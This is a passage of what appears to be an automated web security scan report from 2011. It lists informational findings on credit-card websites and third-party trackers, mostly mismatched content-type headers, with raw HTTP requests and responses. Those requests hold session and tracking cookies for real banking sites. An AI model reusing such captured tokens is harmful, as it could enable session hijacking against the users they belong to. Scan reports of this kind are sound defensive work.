Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308181159.1FE|1306359996.1OD|1308225884.19F|1308181159.60|1308225884.1VV|1308181159.1EY; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 17 Jun 2011 11:59:06 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 17 Jul 2011 11:59:06 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 17 Jun 2011 11:59:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 17 Jun 2011 11:59:06 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

22.5. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Request

Response

22.6. https://wtp101.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wtp101.com
Path:	/

Request

Response

23. Content type incorrectly stated previous
There are 16 instances of this issue:

http://as00.estara.com/fs/ruleaction.php
https://creditcards.citi.com/js/BT.js
http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js
http://images.creditcards.com/7_tropical_beach-america-full.jpg
http://images.creditcards.com/capital-one-orbitz-visa-platinum-excellent.jpg
http://s9.addthis.com/js/widget.php
http://sr2.liveperson.net/hcp/html/mTag.js
http://www.capitalone.com/img/visualscience/vs_img.gif
http://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif
http://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_scale.gif
http://www.discovercard.com/images/logo-discover-financial-services.gif
http://www.discovercard.com/search/images/btn-search-gray-off.gif
https://www.discovercard.com/discover/images/account/customerservice/cards/SILVER_HORIZON.gif
https://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif
https://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_scale.gif
https://www.discovercard.com/search/images/btn-search-gray-off.gif

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

23.1. http://as00.estara.com/fs/ruleaction.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://as00.estara.com
Path:	/fs/ruleaction.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

23.2. https://creditcards.citi.com/js/BT.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://creditcards.citi.com
Path:	/js/BT.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/BT.js HTTP/1.1
Host: creditcards.citi.com
Connection: keep-alive
Referer: https://creditcards.citi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600,max-age=86400
Content-Length: 12760
Content-Type: application/x-javascript
Content-Location: https://creditcards.citi.com/js/BT.js
Expires: Tue, 07 Sep 2010 12:00:00 GMT
Last-Modified: Thu, 22 Jul 2010 03:47:36 GMT
Accept-Ranges: bytes
ETag: "0bc7b9f5029cb1:1cbe"
Vary: Accept-Encoding
Date: Fri, 17 Jun 2011 12:44:17 GMT

..i.f.(.b.t._.d.=.=.n.u.l.l.)..
.    .{..
.    .    .v.a.r. ._.b.t.p.a.t.h.=.".:././.c.i.t.i...b.r.i.d.g.e.t.r.a.c.k...c.o.m./.s.i.t.e./.".;..
.    .    .i.f.(. .(.n.e.w. .S.t.r.i.n.g.(. .d.o.c.u.m.e.n.t...l.o.c.
...[SNIP]...

23.3. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://creditcards.citicards.com
Path:	/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.4. http://images.creditcards.com/7_tropical_beach-america-full.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.creditcards.com
Path:	/7_tropical_beach-america-full.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /7_tropical_beach-america-full.jpg HTTP/1.1
Host: images.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest-page-4.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308313704660%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Alow-interest%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest-page-4.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:24 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 15:10:36 GMT
ETag: "a50e17-bf7-49fdccfdf9300"
Accept-Ranges: bytes
Content-Length: 3063
Content-Type: image/jpeg

GIF89a_.<....1P2.+(p.....-.."..f.............~.i.....Dg5d.sV.....4KDP...r....L..OvG+o.Y..\or....{.A...GQ......EVOi...Si%y.8on*Wb%=3...~..3.....:...e.S.....9bB......JbbcxQ._.r.@...o........~..;j....@
...[SNIP]...

23.5. http://images.creditcards.com/capital-one-orbitz-visa-platinum-excellent.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.creditcards.com
Path:	/capital-one-orbitz-visa-platinum-excellent.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /capital-one-orbitz-visa-platinum-excellent.jpg HTTP/1.1
Host: images.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
Cache-Control: max-age=0
If-Modified-Since: Mon, 27 Apr 2009 14:50:56 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
If-None-Match: "cd8327-9f6-4688a79423400"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:28 GMT
Server: Apache
Last-Modified: Mon, 27 Apr 2009 14:50:56 GMT
ETag: "14d20d8-9f6-4688a79423400"
Accept-Ranges: bytes
Content-Length: 2550
Content-Type: image/jpeg

GIF89a_.<.......)S.............hfhNn.h...2...........ac.............~X.......................7............}...........................................................................................
...[SNIP]...

23.6. http://s9.addthis.com/js/widget.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s9.addthis.com
Path:	/js/widget.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/widget.php?v=10 HTTP/1.1
Host: s9.addthis.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308181159.1FE|1306359996.1OD|1308225884.19F|1308181159.60|1308225884.1VV|1308181159.1EY; dt=X; uid=4dce8a530508b02d; psc=4

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:36:19 GMT
ETag: "df8af2-b267-4a51da0e772c0"
Accept-Ranges: bytes
Content-Length: 45671
Content-Type: text/plain; charset=UTF-8
Date: Fri, 17 Jun 2011 11:58:49 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
var addthis_conf={ver:100};function addthis_click(d,c){try{d.onmouseout=function(){addthis_close()}}catch(f){}return addthis_open(d,c||"",window.addthis_url||"
...[SNIP]...

23.7. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=32528459 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=32528459
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1dbf"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Fri, 17 Jun 2011 11:59:33 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

23.8. http://www.capitalone.com/img/visualscience/vs_img.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.capitalone.com
Path:	/img/visualscience/vs_img.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /img/visualscience/vs_img.gif?LOB=2000&PageName=Venture%20for%20Business&Segment=0&PortletLocation=4:16-col:2-1-1-1&EventType=component&log=1&TestCell=02&ComponentName=VFB%20Double%20Miles:2&r=1308311960416 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_80=828974346.29215.0000; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:19 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Tue, 17 Nov 2009 15:54:00 GMT
Accept-Ranges: bytes
Content-Length: 920
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif

.PNG
.
...IHDR.............(.4.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE............ssskkkZZZ!...B..1..R......B...............1..c.........J..{........J...c..
...[SNIP]...

23.9. http://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.discovercard.com
Path:	/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:10 GMT
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:12:09 GMT
Accept-Ranges: bytes
Content-Length: 468
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif

.PNG
.
...IHDR...s...[.............PLTE.................B.....IDAT.....u.0.D./,.H N n@.._S0\d.ZL1y...ij.|...[..Kg9.....@?.5.B.....JU.R.l..)$)..{P....0.f...\s`....E=sE`....c......T...h.>..w..q6.G
...[SNIP]...

23.10. http://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_scale.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.discovercard.com
Path:	/discover/images/onlineopinionF3r/en-US/black_scale.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /discover/images/onlineopinionF3r/en-US/black_scale.gif HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:10 GMT
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:12:09 GMT
Accept-Ranges: bytes
Content-Length: 178
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif

.PNG
.
...IHDR.......n......"......PLTE..............tRNS....0J...YIDAT..c`..................9..!....&..j(....&.=P.v..5...r.1..........).t.{ ...x?..G.......].R.5......IEND.B`.

23.11. http://www.discovercard.com/images/logo-discover-financial-services.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.discovercard.com
Path:	/images/logo-discover-financial-services.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/logo-discover-financial-services.gif HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:03 GMT
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:11:58 GMT
Accept-Ranges: bytes
Content-Length: 3273
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif

.PNG
.
...IHDR.......&.............PLTE.................n.......n.......RRR..h.......q..............u.dde..M......

..4.~).....{...........Bmmm..}..f........a..4...ZZZBBB...FFF.h............R......
...[SNIP]...

23.12. http://www.discovercard.com/search/images/btn-search-gray-off.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.discovercard.com
Path:	/search/images/btn-search-gray-off.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /search/images/btn-search-gray-off.gif HTTP/1.1
Host: www.discovercard.com
Proxy-Connection: keep-alive
Referer: http://www.discovercard.com/customer-service/terms-of-use.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:06 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 04:58:50 GMT
Accept-Ranges: bytes
Content-Length: 907
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/gif

.PNG
.
...IHDR...6...........>.....PLTE......[ad......BHK...~....................tz}Y_bMSV...ekn.........................................................sx{OVXqwzjor......5<?)03.....................
...[SNIP]...

23.13. https://www.discovercard.com/discover/images/account/customerservice/cards/SILVER_HORIZON.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.discovercard.com
Path:	/discover/images/account/customerservice/cards/SILVER_HORIZON.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /discover/images/account/customerservice/cards/SILVER_HORIZON.gif HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313810|session#1308313730257-773381#1308315610|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:21 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 04:58:43 GMT
Accept-Ranges: bytes
Content-Length: 7069
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: image/gif

.PNG
.
...IHDR...i...E.....~28E....PLTE....................................vuw...................................g............ggi................................n.............................V......
...[SNIP]...

23.14. https://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.discovercard.com
Path:	/discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /discover/images/onlineopinionF3r/en-US/black_pop_en-US.gif HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:32:02 GMT
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:12:09 GMT
Accept-Ranges: bytes
Content-Length: 468
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: image/gif

.PNG
.
...IHDR...s...[.............PLTE.................B.....IDAT.....u.0.D./,.H N n@.._S0\d.ZL1y...ij.|...[..Kg9.....@?.5.B.....JU.R.l..)$)..{P....0.f...\s`....E=sE`....c......T...h.>..w..q6.G
...[SNIP]...

23.15. https://www.discovercard.com/discover/images/onlineopinionF3r/en-US/black_scale.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.discovercard.com
Path:	/discover/images/onlineopinionF3r/en-US/black_scale.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /discover/images/onlineopinionF3r/en-US/black_scale.gif HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:32:02 GMT
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:12:09 GMT
Accept-Ranges: bytes
Content-Length: 178
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: image/gif

.PNG
.
...IHDR.......n......"......PLTE..............tRNS....0J...YIDAT..c`..................9..!....&..j(....&.=P.v..5...r.1..........).t.{ ...x?..G.......].R.5......IEND.B`.

23.16. https://www.discovercard.com/search/images/btn-search-gray-off.gif previous

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.discovercard.com
Path:	/search/images/btn-search-gray-off.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /search/images/btn-search-gray-off.gif HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/registration/reg/goto?forwardName=forgotuserid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
